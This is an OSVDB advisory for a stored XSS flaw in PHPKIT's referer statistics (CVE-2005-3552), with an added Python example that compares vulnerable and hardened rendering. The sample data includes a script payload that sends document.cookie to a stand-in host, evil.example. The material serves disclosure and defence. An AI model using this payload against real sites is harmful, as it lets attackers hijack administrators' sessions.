PHPKIT HTTP Referer Statistics Arbitrary Script Injection

2005-11-07T11:27:18
ID OSVDB:20556
Type osvdb
Reporter Christopher Kunz(christopher.kunz@hardened-php.net)
Modified 2005-11-07T11:27:18

Description

Vulnerability Description

PHPKIT contains a cross-site scripting flaw that may allow a remote attacker to inject arbitrary script. The application records the value of the HTTP 'Referer' request header (exposed to PHP as HTTP_REFERER) for its referer statistics and later displays it to administrators without validating or HTML-encoding it. Because the Referer header is entirely under the client's control, a remote attacker can send a request whose Referer value contains arbitrary JavaScript; the value is stored and then executed in the browser of an administrative user who views the referer statistics, resulting in a loss of integrity.
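The following is an added illustration, not PHPKIT's own code: a minimal model of a referer-statistics page that stores the Referer header of each request and renders the list for an administrator. It shows the two halves of the flaw described above (the client chooses the Referer value, and the page echoes it into HTML unencoded) beside a hardened renderer that encodes on output and only links values that parse as http(s) URLs. The function names, the page layout and the sample Referer values are assumptions for illustration; the sample data is constructed, not captured from PHPKIT.

```python
"""Added example (not PHPKIT code): vulnerable vs. hardened rendering of a
client-controlled Referer header in a referer-statistics page."""
import html
from urllib.parse import urlsplit

# Constructed sample of what a server might have stored from incoming
# requests. The third entry is what an attacker's client would send.
SAMPLE_REFERERS = [
    "http://search.example/?q=phpkit",
    "http://blog.example/post/42",
    'http://evil.example/"><script>document.location='
    '"http://evil.example/?c="+document.cookie</script>',
]


def record_referer(store, request_headers):
    """Recording step: the Referer header is copied verbatim from the
    request. There is no trust boundary here; any client can set any value."""
    ref = request_headers.get("Referer")
    if ref:
        store.append(ref)
    return store


def render_stats_vulnerable(referers):
    """Echoes each stored value straight into HTML. This is the pattern the
    advisory describes: the attacker's <script> lands in the admin's page."""
    rows = "".join(f'<li><a href="{r}">{r}</a></li>' for r in referers)
    return f"<ul>{rows}</ul>"


def render_stats_hardened(referers):
    """HTML-encodes every value on output (so <, >, " and ' cannot break out
    of text or attribute context) and only creates a link when the value
    has an http or https scheme; anything else is shown as inert text."""
    rows = []
    for r in referers:
        safe_text = html.escape(r, quote=True)
        scheme = urlsplit(r).scheme.lower()
        if scheme in ("http", "https"):
            rows.append(f'<li><a href="{safe_text}">{safe_text}</a></li>')
        else:
            rows.append(f"<li>{safe_text}</li>")
    return "<ul>" + "".join(rows) + "</ul>"


def contains_raw_script(markup):
    """Crude check used by this example: does a literal <script tag survive
    in the rendered page?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    stored = record_referer([], {"Referer": SAMPLE_REFERERS[2]})
    print("vulnerable page executes script:",
          contains_raw_script(render_stats_vulnerable(stored)))
    print("hardened page executes script:",
          contains_raw_script(render_stats_hardened(stored)))
```

The hardened renderer treats the header as untrusted text at the point where it enters HTML; validating the value as a URL on input is a useful extra layer but is not sufficient on its own, since a syntactically valid URL can still carry quote and angle-bracket characters.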

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

PHPKIT does not validate or encode the client-controlled HTTP 'Referer' header before displaying it in its referer statistics, allowing a remote attacker to inject JavaScript that executes in the browser of an administrative user who views those statistics.

References:

Vendor URL: http://www.phpkit.de/
Security Tracker: 1015167
Secunia Advisory ID: 17479
Related OSVDB ID: 20553
Related OSVDB ID: 20554
Related OSVDB ID: 20555
Related OSVDB ID: 20557
Related OSVDB ID: 20558
Related OSVDB ID: 20559
Related OSVDB ID: 20560
Related OSVDB ID: 20561
Related OSVDB ID: 20562
Related OSVDB ID: 20563
Other Advisory URL: http://www.hardened-php.net/advisory_212005.80.html
Mail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2005-11/0182.html
CVE ID: CVE-2005-3552
Bugtraq ID: 15354